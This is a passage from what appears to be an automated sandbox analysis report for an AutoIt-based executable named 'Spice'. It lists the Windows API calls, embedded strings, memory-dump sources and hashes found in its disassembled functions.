                                                                                                                                                                                                                                        • Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E82ADF
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E82C2C
                                                                                                                                                                                                                                        • Part of subcall function 00E83EBE: _wcscpy.LIBCMT ref: 00E83EF6
                                                                                                                                                                                                                                        • Part of subcall function 00E9386D: _iswctype.LIBCMT ref: 00E93875
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                                                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                                                                                      • API String ID: 537147316-3738523708
                                                                                                                                                                                                                                      • Opcode ID: 5942433bb78195bd2f83d9a73f895f15a2236fa3ac719d8ac52877d9d8436ec4
                                                                                                                                                                                                                                      • Instruction ID: a00986b2ac0942f8989c71901f6e4faa444644e6b29cc8dc455acadfcf3fffa8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5942433bb78195bd2f83d9a73f895f15a2236fa3ac719d8ac52877d9d8436ec4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E02BE701083419FC724EF24C851AAFBBE5EF99354F10192DF59EA32A2DB31DA49DB42
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?,00F00980), ref: 00EDAF4E
                                                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(00000061,00F2B5F0,00000061), ref: 00EDB018
                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00EDB042
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                      • API String ID: 2820617543-1000479233
                                                                                                                                                                                                                                      • Opcode ID: de9b73368d8ba7639493e8758a6980970e7f9dcc0102af50c0b53aed5d8caadd
                                                                                                                                                                                                                                      • Instruction ID: 06f7be1a07d24d0b0908dd81ca74a91b5d7d7631c0f5a103bcef7b4838debbfd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de9b73368d8ba7639493e8758a6980970e7f9dcc0102af50c0b53aed5d8caadd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD51C370204305DFC714EF14D891AAAB7E5EF94704F54686EF4996B2E2EB31DD0ACB42
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __i64tow__itow__swprintf
                                                                                                                                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                                                                                                                                      • API String ID: 421087845-2263619337
                                                                                                                                                                                                                                      • Opcode ID: 7cb318b8bfe6d9dd1af05874a360295fe71ce5fc9cb4ac2bf1c9991200e8845b
                                                                                                                                                                                                                                      • Instruction ID: ba333690a1e9f49aeff5e6690d37c2b36dbacddf1613dfd093640c2069f0b877
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cb318b8bfe6d9dd1af05874a360295fe71ce5fc9cb4ac2bf1c9991200e8845b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D41A571608209AFDB34EF74DC41E7973E8EB49304F20545EE68EFB292EA31A9429711
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EF778F
                                                                                                                                                                                                                                      • CreateMenu.USER32 ref: 00EF77AA
                                                                                                                                                                                                                                      • SetMenu.USER32(?,00000000), ref: 00EF77B9
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EF7846
                                                                                                                                                                                                                                      • IsMenu.USER32(?), ref: 00EF785C
                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00EF7866
                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EF7893
                                                                                                                                                                                                                                      • DrawMenuBar.USER32 ref: 00EF789B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                                                                                      • String ID: 0$F
                                                                                                                                                                                                                                      • API String ID: 176399719-3044882817
                                                                                                                                                                                                                                      • Opcode ID: daa2f2b87c07fffaea54686a02ec17b25755c17164b2e366bc68647e1e5706a1
                                                                                                                                                                                                                                      • Instruction ID: 6cca985fe3cc37dd9fbed970c2483afa314a77c171b52db8718c64ecad17daa8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: daa2f2b87c07fffaea54686a02ec17b25755c17164b2e366bc68647e1e5706a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88415974A04219EFEB24DF64D888BAABBF5FF48350F184029FA85A7360D730A910DF50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00EF7B83
                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00EF7B8A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00EF7B9D
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00EF7BA5
                                                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EF7BB0
                                                                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00EF7BB9
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00EF7BC3
                                                                                                                                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EF7BD7
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EF7BE3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                      • Opcode ID: dd61b886bec04d33e87523c6096375360ed78770fedcc89d2702bd5c20501037
                                                                                                                                                                                                                                      • Instruction ID: daeec0c239cad29d42a18902cf7e15e8c2169b83d3a68887e59c9726607898e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dd61b886bec04d33e87523c6096375360ed78770fedcc89d2702bd5c20501037
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68318B3210421DABDF119F64DC49FEB3B6AFF0A364F115214FA59A21A0CB31D820EBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00E9706B
                                                                                                                                                                                                                                        • Part of subcall function 00E98D58: __getptd_noexit.LIBCMT ref: 00E98D58
                                                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00E97104
                                                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00E9713A
                                                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 00E97157
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00E971AD
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971C9
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00E971E0
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E971FE
                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 00E97215
                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E97233
                                                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 00E972A4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                                                                      • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                                                                                                                      • Instruction ID: 2b5a613f271708bda81a9a5ae397dc059c533098342ed001bc261b194c2bd57a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 347137B1A24707ABDB149F79CC41BAEB3E8AF45324F14522AF554F7281E770EE488790
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED2CE9
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00F37890,000000FF,00000000,00000030), ref: 00ED2D4A
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(00F37890,00000004,00000000,00000030), ref: 00ED2D80
                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 00ED2D92
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00ED2DD6
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00ED2DF2
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00ED2E1C
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00ED2E61
                                                                                                                                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00ED2EA7
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2EBB
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00ED2EDC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4176008265-0
                                                                                                                                                                                                                                      • Opcode ID: bb504faad8e811c7dbc71356afc0d6185b823165444fda7eb234c78d7e6e70c3
                                                                                                                                                                                                                                      • Instruction ID: 79c5df1beb2c3d3eab01a850eb12e21eab304edfd1e5107547bc9c24fdd47366
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb504faad8e811c7dbc71356afc0d6185b823165444fda7eb234c78d7e6e70c3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C616EB0900249AFDB22DF64CD84ABEBBB9EB51308F14545EF941B7351DB31AD06DB21
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EF75CA
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EF75CD
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF75F1
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EF7602
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EF7614
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EF768C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 830647256-0
                                                                                                                                                                                                                                      • Opcode ID: f46362f1f7551f11b32f37f9f1bd34433b88ed1e32fb3fff521bbdabb928c4a1
                                                                                                                                                                                                                                      • Instruction ID: b62c5236bea51b02103a6a288e4534120d019eb8a663df7e0737d9b828cc6ceb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f46362f1f7551f11b32f37f9f1bd34433b88ed1e32fb3fff521bbdabb928c4a1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A9617A75904208AFDB20DFA8CC85EFE77F8EB09714F10019AFA55A72A1D770AD41DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00EC77DD
                                                                                                                                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00EC7836
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EC7848
                                                                                                                                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00EC7868
                                                                                                                                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00EC78BB
                                                                                                                                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00EC78CF
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EC78E4
                                                                                                                                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00EC78F1
                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC78FA
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EC790C
                                                                                                                                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00EC7917
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2706829360-0
                                                                                                                                                                                                                                      • Opcode ID: 26177172dabe2b387f31444a66f7dcdce89cf9c0bf89690e2a43901856747e0b
                                                                                                                                                                                                                                      • Instruction ID: e1ac8da97255c0f151d27ee245019b90aa65ac7cf16cf1f49a544d2f5a4e299f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26177172dabe2b387f31444a66f7dcdce89cf9c0bf89690e2a43901856747e0b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA415135A0021D9FCF04DF64C988EADBBB9FF48354F008069F955A7261CB31A946DF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • CoInitialize.OLE32 ref: 00EE8AED
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00EE8AF8
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00F03BBC,?), ref: 00EE8B58
                                                                                                                                                                                                                                      • IIDFromString.OLE32(?,?), ref: 00EE8BCB
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE8C65
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE8CC6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                                                                                                                                      • Opcode ID: 8cc257a067f6a2a4823f099ff6a50d1f2136ae83324d6c74b44984ef84b36e29
                                                                                                                                                                                                                                      • Instruction ID: c746dd8d5095df38e9d2cda76c58ebc7eb3cd01d7e443051e865d6e262310299
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cc257a067f6a2a4823f099ff6a50d1f2136ae83324d6c74b44984ef84b36e29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD61CDB02087599FC710DF15CA88F6AB7E8BF45714F10584DF989AB291DB70ED48CBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00EDBB13
                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00EDBB89
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00EDBB93
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00EDBC00
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                      • Opcode ID: cb34a07c356597e71c015dce2ebed36066e721c60274dbbea94ce92fe8c7ac18
                                                                                                                                                                                                                                      • Instruction ID: acce84ff0f735950ff5359c7484b2c32e7e9f3e81cf26739983e74a0b9654b65
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb34a07c356597e71c015dce2ebed36066e721c60274dbbea94ce92fe8c7ac18
